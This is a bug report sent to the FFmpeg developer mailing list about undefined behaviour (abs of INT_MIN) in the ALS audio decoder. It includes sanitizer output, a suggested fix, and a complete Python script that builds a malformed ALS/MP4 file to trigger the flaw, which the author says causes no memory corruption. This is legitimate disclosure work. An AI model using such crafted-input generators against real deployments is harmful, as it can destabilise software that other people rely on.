Hi,

I found a UBSan-confirmed undefined behavior in libavcodec/alsdec.c.

FFmpeg version: N-123228-g0ddece40c5
Build: gcc 11 (Ubuntu 11.4.0-1ubuntu1~22.04.3), -fsanitize=address,undefined

Location: alsdec.c:1563

    nbits[i] = 23 - av_log2(abs(ctx->raw_samples[c][i]));

When raw_samples[c][i] == INT_MIN (0x80000000), abs() invokes undefined
behavior -- negation of INT_MIN cannot be represented in signed int.

UBSan output:
    libavcodec/alsdec.c:1563:41: runtime error: negation of
-2147483648 cannot be
    represented in type 'int'; cast to an unsigned type to negate this
value to itself
        #0 in read_diff_float_data  libavcodec/alsdec.c:1563
        #1 in read_frame_data       libavcodec/alsdec.c:1793
        #2 in decode_frame          libavcodec/alsdec.c:1836
        #3 in decode_simple_internal libavcodec/decode.c:444

Trigger conditions:
  - ALS stream with floating=1 in ALSSpecificConfig
  - acf != FLOAT_1 (takes the av_cmp_sf_ieee754 branch at L1562)
  - Rice-coded sample value that produces raw_samples[c][i] == INT_MIN
    (e.g. shift_lsbs=16, decoded value=32768 -> 32768 << 16 = 0x80000000)

Reproduction (UBSan+ASan build required):
    python3 poc_als.py        # generates /tmp/poc_als
    ffmpeg -i /tmp/poc_als -f null - 2>&1

Note: no memory corruption results. The FFMIN() at L1567 uses an unsigned
comparison (highest_byte is unsigned int), so the indeterminate nbits[i]
value gets clamped before any memory access or nchars accumulation.

Suggested fix:

    nbits[i] = 23 - av_log2(FFABS(ctx->raw_samples[c][i]));

FFABS() handles INT_MIN correctly by casting to unsigned before negation.

PoC generator (poc_als.py) and full UBSan log (crash.log) attached.

Thanks,
Jenny Guanni Qu
[email protected]

Attachment: crash.log
Description: Binary data

#!/usr/bin/env python3
"""
PoC for UBSan-confirmed undefined behavior in alsdec.c read_diff_float_data()

Bug: nbits[i] = 23 - av_log2(abs(raw_samples[i])). When raw_samples[i] == INT_MIN
(0x80000000), abs(INT_MIN) invokes undefined behavior -- negation of INT_MIN cannot
be represented in type 'int'. UBSan reports:
    runtime error: negation of -2147483648 cannot be represented in type 'int'

Note: No heap overflow results. The FFMIN() at L1567 uses an unsigned comparison
(highest_byte is unsigned int), so the indeterminate nbits[i] value is clamped
before any memory access or nchars accumulation.

Trigger: ALS stream with floating=1, acf!=FLOAT_1, raw_samples == INT_MIN (achieved
via shift_lsbs=16), highest_byte != 0.
"""

import struct
import sys
import io

def write_be32(val):
    return struct.pack('>I', val & 0xFFFFFFFF)

def write_be16(val):
    return struct.pack('>H', val & 0xFFFF)

def write_be24(val):
    return struct.pack('>I', val & 0xFFFFFF)[1:]

class BitWriter:
    def __init__(self):
        self.bits = []

    def write_bits(self, value, nbits):
        for i in range(nbits - 1, -1, -1):
            self.bits.append((value >> i) & 1)

    def write_bit(self, value):
        self.bits.append(value & 1)

    def to_bytes(self):
        # Pad to byte boundary
        while len(self.bits) % 8 != 0:
            self.bits.append(0)
        result = bytearray()
        for i in range(0, len(self.bits), 8):
            byte = 0
            for j in range(8):
                byte = (byte << 1) | self.bits[i + j]
            result.append(byte)
        return bytes(result)

    def __len__(self):
        return len(self.bits)


def rice_encode(value, k):
    """Encode a signed value using Rice coding as per alsdec.c decode_rice().

    decode_rice: q = unary(0), r = get_bits1(gb)
    if k > 1: q <<= (k-1), q += get_bits(gb, k-1)
    if k == 1: (same as k>1 but k-1=0)
    if k == 0: special
    return r ? q : ~q
    """
    bits = []

    if value >= 0:
        r = 1
        q = value
    else:
        r = 0
        q = ~value  # ~value for negative

    if k > 1:
        q_high = q >> (k - 1)
        q_low = q & ((1 << (k - 1)) - 1)
    elif k == 1:
        q_high = q
        q_low = None  # no extra bits
    else:
        # k == 0: q = unary >> 1, r = !(q_orig & 1)
        # For simplicity, handle differently
        if value >= 0:
            q_orig = value * 2
        else:
            q_orig = (-value) * 2 - 1
        # Unary encode q_orig (1-bits then 0-bit)
        for _ in range(q_orig):
            bits.append(1)
        bits.append(0)
        return bits

    # Unary encode q_high (q_high ones followed by a 0)
    # get_unary(gb, 0, max) counts 1-bits until a 0-bit
    for _ in range(q_high):
        bits.append(1)
    bits.append(0)

    # r bit
    bits.append(r)

    # k-1 low bits (MSB first)
    if k > 1:
        for i in range(k - 2, -1, -1):
            bits.append((q_low >> i) & 1)

    return bits


def build_als_extradata(sample_rate, num_samples, num_channels, frame_length):
    """Build AudioSpecificConfig with ALS specific config as extradata."""
    bw = BitWriter()

    # AudioSpecificConfig
    # audioObjectType = 36 (ALS) - needs 5 bits = 31 (escape) + 6 bits = 36-32=4
    bw.write_bits(31, 5)  # escape
    bw.write_bits(4, 6)   # 32 + 4 = 36

    # samplingFrequencyIndex = 0xF (escape, then 24-bit freq)
    bw.write_bits(0xF, 4)
    bw.write_bits(sample_rate, 24)

    # channelConfiguration = 1 (mono)
    bw.write_bits(1, 4)

    # For ALS (AOT 36), the parser does:
    # skip_bits(gb, 5)  -- 5 bits padding/fillBits
    # Then checks for ALS\0 marker
    bw.write_bits(0, 5)  # 5 fill bits

    # ALSSpecificConfig starts here
    # ALS identifier: 'ALS\0'
    bw.write_bits(0x414C5300, 32)

    # samp_freq (32 bits)
    bw.write_bits(sample_rate, 32)

    # samples (32 bits)
    bw.write_bits(num_samples, 32)

    # channels - 1 (16 bits)
    bw.write_bits(num_channels - 1, 16)

    # file_type (3 bits) = 0 (raw)
    bw.write_bits(0, 3)

    # resolution (3 bits) = 3 (32-bit)
    bw.write_bits(3, 3)

    # floating (1 bit) = 1
    bw.write_bit(1)

    # msb_first (1 bit) = 0
    bw.write_bit(0)

    # frame_length - 1 (16 bits)
    bw.write_bits(frame_length - 1, 16)

    # ra_distance (8 bits) = 1 (every frame is RA)
    bw.write_bits(1, 8)

    # ra_flag (2 bits) = 0 (RA_FLAG_NONE - no ra unit sizes)
    bw.write_bits(0, 2)

    # adapt_order (1 bit) = 0
    bw.write_bit(0)

    # coef_table (2 bits) = 0
    bw.write_bits(0, 2)

    # long_term_prediction (1 bit) = 0
    bw.write_bit(0)

    # max_order (10 bits) = 0
    bw.write_bits(0, 10)

    # block_switching (2 bits) = 0
    bw.write_bits(0, 2)

    # bgmc (1 bit) = 0
    bw.write_bit(0)

    # sb_part (1 bit) = 0
    bw.write_bit(0)

    # joint_stereo (1 bit) = 0
    bw.write_bit(0)

    # mc_coding (1 bit) = 0
    bw.write_bit(0)

    # chan_config (1 bit) = 0
    bw.write_bit(0)

    # chan_sort (1 bit) = 0
    bw.write_bit(0)

    # crc_enabled (1 bit) = 0
    bw.write_bit(0)

    # rlslms (1 bit) = 0
    bw.write_bit(0)

    # reserved (5 bits) = 0
    bw.write_bits(0, 5)

    # aux_data_enabled (1 bit) = 0
    bw.write_bit(0)

    # header_size (32 bits) = 0xFFFFFFFF (no header)
    bw.write_bits(0xFFFFFFFF, 32)

    # trailer_size (32 bits) = 0xFFFFFFFF (no trailer)
    bw.write_bits(0xFFFFFFFF, 32)

    return bw.to_bytes()


def build_als_frame(frame_length):
    """Build one ALS frame with crafted data to trigger the bug.

    Strategy:
    - Variable block with opt_order=0 (max_order=0, adapt_order=0)
    - Rice parameter s[0] = 15 (fits in 5 bits)
    - shift_lsbs = 16 (to shift samples left by 16)
    - Rice-encode value 32768 (0x8000) for each sample
    - After shift: (unsigned)32768 << 16 = 0x80000000 (INT_MIN)
    - abs(INT_MIN) invokes UB: negation of INT_MIN cannot be represented in 'int'
    - UBSan reports: runtime error: negation of -2147483648 cannot be represented
      in type 'int'; cast to an unsigned type to negate this value to itself
    - FFMIN at L1567 clamps nbits before any memory access (no heap overflow)
    """
    bw = BitWriter()

    # === Frame data (read_frame_data) ===
    # mc_coding=0, joint_stereo=0 -> independent_bs=1
    # block_switching=0 -> no bs_info bits read
    # parse_bs_info(0,...) produces 1 block of frame_length

    # For channel 0 (only channel, independent):
    # read_block: first bit = 1 (variable block)
    bw.write_bit(1)

    # read_var_block_data:
    # js_blocks (1 bit) = 0
    bw.write_bit(0)

    # bgmc=0, sb_part=0: no sub-block bits read
    # s[0] = get_bits(gb, 5) [resolution=3 > 1, so 4+1=5 bits]
    # Set s[0] = 15 (Rice parameter)
    bw.write_bits(15, 5)

    # shift_lsbs flag (1 bit) = 1
    bw.write_bit(1)
    # shift_lsbs value: get_bits(gb, 4) + 1 = 16, so write 15
    bw.write_bits(15, 4)

    # rlslms=0, adapt_order=0, max_order=0 -> opt_order = max_order = 0
    # No PARCOR coefficient reading
    # No LTP reading (ltp=0)

    # RA block with opt_order=0: no initial samples

    # Rice-encode frame_length residuals with k=15
    # Value 32768: positive, r=1, q=32768
    # k=15: q_high = 32768 >> 14 = 2, q_low = 32768 & 0x3FFF = 0
    # Unary(2) = 001, r=1, q_low(14 bits) = 00000000000000
    # Total per sample: 3 + 1 + 14 = 18 bits
    for _ in range(frame_length):
        rice_bits = rice_encode(32768, 15)
        for b in rice_bits:
            bw.write_bit(b)

    # Align to byte boundary (for non-mc_coding, non-joint_stereo path,
    # align_get_bits is called in read_block)
    while len(bw) % 8 != 0:
        bw.write_bit(0)

    # === read_diff_float_data (floating=1) ===
    # 32 bits: num_bytes_diff_float (skipped, any value)
    bw.write_bits(0, 32)

    # use_acf (1 bit) = 0 -> acf[c] != FLOAT_1, takes the vulnerable nbits branch at alsdec.c:1562
    bw.write_bit(0)

    # Per channel (1 channel):
    # highest_byte (2 bits) = 3
    bw.write_bits(3, 2)

    # partA_flag (1 bit) = 0 (skip part A)
    bw.write_bit(0)

    # shift_amp (1 bit) = 0 (use last_shift_value = 0 from RA init)
    bw.write_bit(0)

    # Part B (highest_byte=3 != 0):
    # nbits computed for each non-zero sample:
    # raw_samples[i] = (unsigned)32768 << 16 = 0x80000000 (as int32 = INT_MIN)
    # abs(INT_MIN) -> UB: negation of -2147483648 cannot be represented in 'int'
    # av_log2 result is indeterminate; FFMIN at L1567 clamps before memory access
    #
    # compressed/uncompressed bit (1 bit) = 1 (compressed -> MLZ path)
    bw.write_bit(1)

    # Provide some bits for MLZ to attempt reading
    for _ in range(256):
        bw.write_bits(0, 8)

    return bw.to_bytes()


def build_mp4(extradata, frame_data):
    """Build a minimal MP4 container with ALS audio."""

    def box(box_type, data):
        size = 8 + len(data)
        return struct.pack('>I', size) + box_type + data

    # ftyp box
    ftyp = box(b'ftyp', b'M4A \x00\x00\x00\x00M4A mp42')

    # Build esds (ES Descriptor)
    # DecoderConfigDescriptor
    dec_config_desc = bytes([
        0x04,  # DecoderConfigDescrTag
        len(extradata) + 13,  # length
        0x40,  # objectTypeIndication = Audio ISO/IEC 14496-3
        0x15,  # streamType = audio (5<<2 | 1)
        0x00, 0x00, 0x00,  # bufferSizeDB
        0x00, 0x01, 0x00, 0x00,  # maxBitrate
        0x00, 0x01, 0x00, 0x00,  # avgBitrate
        0x05,  # DecoderSpecificInfoTag
        len(extradata),
    ]) + extradata

    esds_data = bytes([
        0x00, 0x00, 0x00, 0x00,  # version + flags
        0x03,  # ES_DescrTag
        len(dec_config_desc) + 3,  # length
        0x00, 0x01,  # ES_ID
        0x00,  # stream priority
    ]) + dec_config_desc + bytes([
        0x06, 0x01, 0x02,  # SLConfigDescriptor
    ])

    esds = box(b'esds', esds_data)

    # mp4a sample entry
    sample_rate = 44100
    mp4a_data = bytes([
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  # reserved
        0x00, 0x01,  # data_reference_index
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  # reserved
        0x00, 0x01,  # channel_count = 1
        0x00, 0x10,  # sample_size = 16
        0x00, 0x00,  # compression_id
        0x00, 0x00,  # packet_size
    ]) + struct.pack('>HH', sample_rate, 0) + esds  # sample_rate as 16.16 fixed point

    mp4a = box(b'mp4a', mp4a_data)

    # stsd
    stsd = box(b'stsd', bytes([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01]) + mp4a)

    # stts (time-to-sample)
    frame_length = 4  # must match
    stts = box(b'stts', struct.pack('>II II', 0, 1, 1, frame_length))

    # stsc (sample-to-chunk)
    stsc = box(b'stsc', struct.pack('>II III', 0, 1, 1, 1, 1))

    # stsz (sample size)
    stsz = box(b'stsz', struct.pack('>III', 0, 0, 1) + struct.pack('>I', len(frame_data)))

    # stco (chunk offset) - will be fixed up
    stco = box(b'stco', struct.pack('>II', 0, 1) + struct.pack('>I', 0))  # offset TBD

    stbl = box(b'stbl', stsd + stts + stsc + stsz + stco)

    # smhd (sound media header)
    smhd = box(b'smhd', bytes(8))

    # dinf + dref
    url_box = box(b'url ', bytes([0x00, 0x00, 0x00, 0x01]))  # self-contained
    dref = box(b'dref', struct.pack('>II', 0, 1) + url_box)
    dinf = box(b'dinf', dref)

    minf = box(b'minf', smhd + dinf + stbl)

    # mdhd (media header)
    mdhd = box(b'mdhd', struct.pack('>IIIIII', 0, 0, 0, 44100, frame_length, 0))

    # hdlr (handler)
    hdlr = box(b'hdlr', bytes(4) + b'\x00\x00\x00\x00soun' + bytes(12) + b'SoundHandler\x00')

    mdia = box(b'mdia', mdhd + hdlr + minf)

    # tkhd (track header)
    tkhd = box(b'tkhd', struct.pack('>I', 0x03) + bytes(4*4) +
               struct.pack('>I', 1) + bytes(4*2) +
               struct.pack('>I', frame_length) +
               bytes(8) +
               struct.pack('>HH', 0, 0) +
               struct.pack('>H', 0x0100) + bytes(2) +
               bytes(36) +
               struct.pack('>II', 0, 0))

    trak = box(b'trak', tkhd + mdia)

    # mvhd (movie header)
    mvhd = box(b'mvhd', struct.pack('>IIIIII', 0, 0, 0, 44100, frame_length, 0) +
               struct.pack('>I', 0x00010000) +
               struct.pack('>H', 0x0100) +
               bytes(10) +
               bytes(36) +
               bytes(24) +
               struct.pack('>I', 2))

    moov = box(b'moov', mvhd + trak)

    # mdat
    mdat = box(b'mdat', frame_data)

    # Calculate actual stco offset
    mdat_data_offset = len(ftyp) + len(moov) + 8

    result = ftyp + moov + mdat

    # Find stco in result and patch the offset
    stco_needle = b'stco'
    pos = result.find(stco_needle)
    if pos >= 0:
        offset_pos = pos + 4 + 4 + 4
        result = bytearray(result)
        struct.pack_into('>I', result, offset_pos, mdat_data_offset)
        result = bytes(result)

    return result


def main():
    sample_rate = 44100
    frame_length = 4
    num_samples = frame_length
    num_channels = 1

    print(f"[*] Building ALS PoC")
    print(f"    Sample rate: {sample_rate}")
    print(f"    Frame length: {frame_length}")
    print(f"    Channels: {num_channels}")
    print(f"    floating=1, max_order=0, adapt_order=0")
    print(f"    Rice param s[0]=15, shift_lsbs=16")
    print(f"    Raw sample value: 32768 << 16 = 0x80000000 (INT_MIN)")
    print(f"    nbits = 23 - av_log2(abs(INT_MIN)) triggers UB at alsdec.c:1563")
    print(f"    abs(INT_MIN): negation of -2147483648 cannot be represented in 'int'")
    print(f"    FFMIN at L1567 clamps nbits before any memory access (no heap overflow)")

    extradata = build_als_extradata(sample_rate, num_samples, num_channels, frame_length)
    print(f"\n[*] Extradata size: {len(extradata)} bytes")
    print(f"    Hex: {extradata.hex()}")

    frame_data = build_als_frame(frame_length)
    print(f"[*] Frame data size: {len(frame_data)} bytes")
    print(f"    Hex: {frame_data.hex()}")

    mp4_data = build_mp4(extradata, frame_data)

    output_path = "/tmp/poc_als"
    with open(output_path, 'wb') as f:
        f.write(mp4_data)

    print(f"\n[+] PoC written to {output_path} ({len(mp4_data)} bytes)")
    print(f"\n[*] Test with (UBSan+ASan build required):")
    print(f"    python3 poc_als.py")
    print(f"    ~/ffmpeg/ffmpeg -i {output_path} -f null - 2>&1 | tail -50")


if __name__ == '__main__':
    main()
_______________________________________________
ffmpeg-devel mailing list -- [email protected]
To unsubscribe send an email to [email protected]

Reply via email to